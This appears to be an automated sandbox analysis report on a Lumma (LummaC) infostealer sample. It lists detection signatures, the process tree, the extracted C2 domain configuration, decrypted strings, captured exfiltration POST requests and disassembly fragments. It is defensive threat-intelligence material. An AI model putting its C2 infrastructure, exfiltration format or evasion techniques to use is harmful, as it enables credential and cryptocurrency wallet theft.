Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
qeUaxJCA3FO.exe

Overview

General Information

Sample name:qeUaxJCA3FO.exe
Analysis ID:1467846
MD5:efc76b9581da08661c9c91c2a6e7d289
SHA1:ef7674fe136d80308a44d99ac72b8be550604110
SHA256:85356bb669ec17503e48ca457e99347f5386ba644fba9d638d4188a7b4970153
Tags:exelumma
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • qeUaxJCA3FO.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\qeUaxJCA3FO.exe" MD5: EFC76B9581DA08661C9C91C2A6E7D289)
    • RegAsm.exe (PID: 7552 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 7560 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • WerFault.exe (PID: 7640 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7528 -s 304 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["benchillppwo.shop", "publicitttyps.shop", "answerrsdo.shop", "radiationnopp.shop", "affecthorsedpo.shop", "bargainnykwo.shop", "bannngwko.shop", "bouncedgowp.shop", "bitchsafettyudjwu.shop"], "Build id": "LPnhqo--@SEFYALUV"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      No Sigma rule has matched
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://bitchsafettyudjwu.shop/apiAvira URL Cloud: Label: malware
      Source: https://bitchsafettyudjwu.shop:443/apiAvira URL Cloud: Label: malware
      Source: 2.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["benchillppwo.shop", "publicitttyps.shop", "answerrsdo.shop", "radiationnopp.shop", "affecthorsedpo.shop", "bargainnykwo.shop", "bannngwko.shop", "bouncedgowp.shop", "bitchsafettyudjwu.shop"], "Build id": "LPnhqo--@SEFYALUV"}
      Source: qeUaxJCA3FO.exeReversingLabs: Detection: 57%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: qeUaxJCA3FO.exeJoe Sandbox ML: detected
      Source: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: benchillppwo.shop
      Source: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: publicitttyps.shop
      Source: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: answerrsdo.shop
      Source: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: radiationnopp.shop
      Source: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: affecthorsedpo.shop
      Source: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bargainnykwo.shop
      Source: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bannngwko.shop
      Source: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bouncedgowp.shop
      Source: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bitchsafettyudjwu.shop
      Source: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
      Source: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
      Source: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
      Source: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
      Source: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
      Source: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: LPnhqo--@SEFYALUV
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00416448 CryptUnprotectData,2_2_00416448
      Source: qeUaxJCA3FO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 104.21.27.50:443 -> 192.168.2.4:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.27.50:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.27.50:443 -> 192.168.2.4:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.27.50:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.27.50:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.27.50:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.27.50:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.27.50:443 -> 192.168.2.4:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.27.50:443 -> 192.168.2.4:49749 version: TLS 1.2
      Source: qeUaxJCA3FO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_00FAF7AE FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00FAF7AE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolderJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_00427964
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [eax+edi*8], 11081610h2_2_004209C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [eax+ebx*8], 11081610h2_2_004209C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add ebx, 02h2_2_004171F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]2_2_0040A2D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax2_2_00416448
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]2_2_00416448
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 11081610h2_2_00416448
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]2_2_00418D70
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]2_2_004165AF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 11081610h2_2_004165AF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h2_2_0041AE00
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]2_2_00415ED0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi]2_2_00439800
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esi+04h]2_2_00439800
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+00000890h]2_2_0041F836
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+00000890h]2_2_0041F836
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [esi]2_2_004390D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esi+04h]2_2_004390D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]2_2_00413880
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00414166
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+54h]2_2_0041393C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, eax2_2_004039F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then dec eax2_2_0041F9F6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]2_2_0042118E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then inc ebx2_2_004159A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, 2F18678Dh2_2_00428A46
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi]2_2_004282C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], 00D23749h2_2_0041D2D4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 71907C71h2_2_0041D2D4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]2_2_004182FE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx2_2_004182FE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax2_2_00423AAF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]2_2_00403BB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_004253B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esi+04h]2_2_00439BB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx2_2_00433462
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_00425C76
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]2_2_004154D3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_004274ED
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]2_2_0040E4F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_00435540
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_00427510
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ecx], dl2_2_00426DC3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h2_2_004165C4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add ebx, 02h2_2_00416DB9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]2_2_00402E70
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax2_2_00422E10
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_004306E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esi+04h]2_2_004396B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx2_2_00417742
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ecx], dx2_2_0041FF50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edi], cx2_2_0041FF50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add ecx, dword ptr [esp+edx*4+34h]2_2_004087E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [ecx], 00000000h2_2_00413FA2

      Networking

      barindex
      Source: Malware configuration extractorURLs: benchillppwo.shop
      Source: Malware configuration extractorURLs: publicitttyps.shop
      Source: Malware configuration extractorURLs: answerrsdo.shop
      Source: Malware configuration extractorURLs: radiationnopp.shop
      Source: Malware configuration extractorURLs: affecthorsedpo.shop
      Source: Malware configuration extractorURLs: bargainnykwo.shop
      Source: Malware configuration extractorURLs: bannngwko.shop
      Source: Malware configuration extractorURLs: bouncedgowp.shop
      Source: Malware configuration extractorURLs: bitchsafettyudjwu.shop
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: bitchsafettyudjwu.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: bitchsafettyudjwu.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18167Host: bitchsafettyudjwu.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8788Host: bitchsafettyudjwu.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20441Host: bitchsafettyudjwu.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5442Host: bitchsafettyudjwu.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1286Host: bitchsafettyudjwu.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570028Host: bitchsafettyudjwu.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: bitchsafettyudjwu.shop
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: bitchsafettyudjwu.shop
      Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: bitchsafettyudjwu.shop
      Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
      Source: RegAsm.exe, 00000002.00000002.1768091820.000000000146E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitchsafettyudjwu.shop/
      Source: RegAsm.exe, 00000002.00000002.1768091820.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitchsafettyudjwu.shop/PR
      Source: RegAsm.exe, 00000002.00000002.1768091820.0000000001419000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1768091820.000000000146E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitchsafettyudjwu.shop/api
      Source: RegAsm.exe, 00000002.00000002.1768091820.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitchsafettyudjwu.shop/apie
      Source: RegAsm.exe, 00000002.00000002.1768091820.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitchsafettyudjwu.shop/apix
      Source: RegAsm.exe, 00000002.00000002.1768091820.000000000146E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitchsafettyudjwu.shop/on
      Source: RegAsm.exe, 00000002.00000002.1768091820.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitchsafettyudjwu.shop/pa
      Source: RegAsm.exe, 00000002.00000002.1768091820.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitchsafettyudjwu.shop:443/api
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownHTTPS traffic detected: 104.21.27.50:443 -> 192.168.2.4:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.27.50:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.27.50:443 -> 192.168.2.4:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.27.50:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.27.50:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.27.50:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.27.50:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.27.50:443 -> 192.168.2.4:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.27.50:443 -> 192.168.2.4:49749 version: TLS 1.2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042E680 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_0042E680
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042E680 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_0042E680
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042E850 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,2_2_0042E850
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_00F928800_2_00F92880
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_00FAB11C0_2_00FAB11C
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_00FA125C0_2_00FA125C
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_00F933200_2_00F93320
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_00FA15A40_2_00FA15A4
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_00FA9D960_2_00FA9D96
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_00FA55700_2_00FA5570
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_00FB36B50_2_00FB36B5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004209C02_2_004209C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004172662_2_00417266
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004053502_2_00405350
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004164482_2_00416448
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004215102_2_00421510
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040F8502_2_0040F850
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004398002_2_00439800
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004280082_2_00428008
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004390D02_2_004390D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004248E92_2_004248E9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004019722_2_00401972
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004049302_2_00404930
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004329F02_2_004329F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041F9F62_2_0041F9F6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004071802_2_00407180
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043B1A02_2_0043B1A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00435B302_2_00435B30
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00406BB02_2_00406BB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00439BB02_2_00439BB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401C7A2_2_00401C7A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043B4C02_2_0043B4C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004234CC2_2_004234CC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004364E02_2_004364E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401D002_2_00401D00
